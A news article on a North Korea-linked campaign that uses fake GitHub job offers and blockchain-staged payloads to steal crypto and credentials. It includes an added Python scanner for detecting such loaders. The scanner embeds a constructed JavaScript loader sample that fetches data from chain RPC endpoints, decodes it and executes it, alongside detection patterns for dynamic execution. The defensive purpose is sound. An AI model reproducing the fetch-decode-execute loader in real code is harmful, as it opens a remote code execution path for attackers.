Fake GitHub Job Offers Trigger Omnistealer Malware Attack Stealing Crypto, Passwords and Global Credentials
A sophisticated attack chain disguised as a routine freelance job offer has been uncovered, and researchers are calling it one of the most dangerous malware frameworks yet seen in the crypto ecosystem. The operation, attributed to North Korean hacking groups, uses fake recruitment pitches and code hidden in GitHub repositories to infiltrate developers' systems and drain digital assets worldwide.
Fake Jobs, Real Attack Chain
The incident began when Crystal Intelligence’s then-vice president of engineering received a LinkedIn message offering freelance web development work. Suspicious of the request, he examined the GitHub repository he had been sent and uncovered a concealed attack chain designed to go unnoticed by a developer who simply cloned and ran the project.
Once executed, the code contacts the TRON and Aptos blockchains and uses them as routing layers that point to the next stage, ultimately fetching the malicious payload from the Binance Smart Chain. According to Nick Smart, Crystal Intelligence’s chief intelligence officer, this layered approach forms a cascading structure that delivers “the final form malicious code.” The practical consequence is that the repository itself contains only a small loader; the parts that would trip a scanner live off-repository, on public chains.
“It Literally Steals Everything”
Security researchers at Ransom-ISAC have dubbed the malware “Omnistealer” because of its wide-ranging capabilities. “It literally steals everything,” said Ellis Stannard, a core member of the group. The malware targets more than 60 cryptocurrency wallet extensions, including MetaMask and Coinbase, as well as the major web browsers, password managers and cloud storage clients.
This means the attackers are not only after crypto holdings but after full digital identities, including corporate credentials and sensitive enterprise data.
Blockchain as a Permanent Weapon
Investigators found that parts of the malware were embedded in blockchain transactions. Because a public chain cannot be taken down or edited the way a command-and-control server can, those stages are effectively immutable and cannot be removed. This allows dormant malicious code to be activated long after initial deployment, creating what experts describe as a “sleeping attack infrastructure.”
Ransom-ISAC researchers compared its scale to the WannaCry ransomware outbreak, but warned that this campaign could be significantly larger and harder to contain.
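The one point in the chain a developer can still inspect is the loader sitting in the repository: the article describes code that reaches out to several chains and then executes whatever comes back. The script below is an added example of a pre-clone triage check for exactly that combination; it is not code from the page, from Crystal Intelligence or from Ransom-ISAC. It assumes a JavaScript/Node project, uses the public RPC gateway hostnames of the three chains named above as indicators (the page does not say which endpoints or contracts the campaign actually used), and runs over a small constructed sample repository embedded in the script.

```python
"""Triage a source tree for the loader pattern described in the article:
blockchain RPC lookups chained into dynamic code execution.

Added example, not the campaign's code. Indicators and sample files are
constructed for illustration; the hostnames are public RPC gateways and are
assumptions, not attribution data from the article.
"""
import re
from dataclasses import dataclass

# Hypothetical indicator set. A real deployment would extend these from
# threat intel rather than hard-code them.
CHAIN_RPC = {
    "tron": re.compile(r"api\.trongrid\.io|tronweb", re.I),
    "aptos": re.compile(r"fullnode\.mainnet\.aptoslabs\.com", re.I),
    "bsc": re.compile(r"bsc-dataseed|chainId\s*[:=]\s*56\b", re.I),
}
# Ways for fetched text to become running code in Node.
DYNAMIC_EXEC = re.compile(r"\beval\s*\(|new\s+Function\s*\(|vm\.runIn|child_process", re.I)
# Decoding steps that usually sit between the fetch and the exec.
DECODE = re.compile(r"Buffer\.from\([^)]*['\"]base64['\"]\)|\batob\s*\(|fromCharCode", re.I)
# Long opaque literals: embedded blobs, contract bytecode, packed payloads.
OPAQUE_BLOB = re.compile(r"['\"](?:[A-Za-z0-9+/=]{120,}|(?:0x)?[0-9a-f]{120,})['\"]")


@dataclass
class Finding:
    path: str
    line: int
    kind: str
    snippet: str


def scan_source(path: str, text: str) -> list[Finding]:
    """Return every indicator hit in one file, with its line number."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        snippet = line.strip()[:80]
        for chain, rx in CHAIN_RPC.items():
            if rx.search(line):
                findings.append(Finding(path, n, f"rpc:{chain}", snippet))
        if DYNAMIC_EXEC.search(line):
            findings.append(Finding(path, n, "dynamic-exec", snippet))
        if DECODE.search(line):
            findings.append(Finding(path, n, "decode", snippet))
        if OPAQUE_BLOB.search(line):
            findings.append(Finding(path, n, "opaque-blob", snippet))
    return findings


def triage(repo: dict[str, str]) -> dict:
    """Score a whole tree. The verdict is driven by the *combination* of
    indicators, not by any single hit: a legitimate dApp talks to one chain,
    and plenty of tooling calls eval, but a loader that walks several chains
    and then executes the result is the pattern worth blocking."""
    findings = [f for path, text in repo.items() for f in scan_source(path, text)]
    kinds = {f.kind for f in findings}
    chains = {k.split(":", 1)[1] for k in kinds if k.startswith("rpc:")}
    if not findings:
        verdict = "clean"
    elif len(chains) >= 2 and "dynamic-exec" in kinds:
        verdict = "block"
    elif chains and ("decode" in kinds or "opaque-blob" in kinds):
        verdict = "suspicious"
    else:
        verdict = "review"
    return {"verdict": verdict, "chains": sorted(chains), "findings": findings}


# Constructed sample repository: one benign file and one loader that mirrors
# the staging the article describes (TRON -> Aptos -> BSC -> execute).
SAMPLE_REPO = {
    "src/app.js": "import express from 'express';\nconst app = express();\napp.listen(3000);\n",
    "src/wallet-util.js": (
        "const axios = require('axios');\n"
        "const TRON = 'https://api.trongrid.io/v1/contracts/<address>/events';\n"
        "const APTOS = 'https://fullnode.mainnet.aptoslabs.com/v1/accounts/<address>/resources';\n"
        "const BSC = 'https://bsc-dataseed.binance.org/';\n"
        "async function boot() {\n"
        "  const a = await axios.get(TRON); const b = await axios.get(APTOS + a.data.next);\n"
        "  const code = Buffer.from(b.data.blob, 'base64').toString();\n"
        "  new Function('require', code)(require);\n"
        "}\nboot();\n"
    ),
}

if __name__ == "__main__":
    result = triage(SAMPLE_REPO)
    print(result["verdict"], result["chains"])
    for f in result["findings"]:
        print(f"{f.path}:{f.line} [{f.kind}] {f.snippet}")
```

Run it against a freshly cloned repository by reading each `.js`/`.ts` file into the dictionary before calling `triage`. The check is deliberately coarse: its job is to stop a developer from running `npm install && npm start` on a stranger's project, not to replace a sandboxed detonation of the code.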
North Korea Link and Global Exposure
Investigators traced the attackers to IP addresses previously associated with North Korean state-sponsored activity operating out of Vladivostok. They estimate that nearly 300,000 credentials have been stolen from cybersecurity companies, defense contractors and government organizations across multiple countries.
Key Takeaways
The attackers pose as recruiters and freelance developers and target contractors who will run the code they are sent. South Asia is a prime target because of its large developer population and high cryptocurrency usage.
The campaign shows how state-backed cyber operations now combine job offers, open-source code and blockchain infrastructure into a single, wide-reaching attack network. Researchers warn that the threat is heightened because they have not yet identified a specific objective behind the campaign.
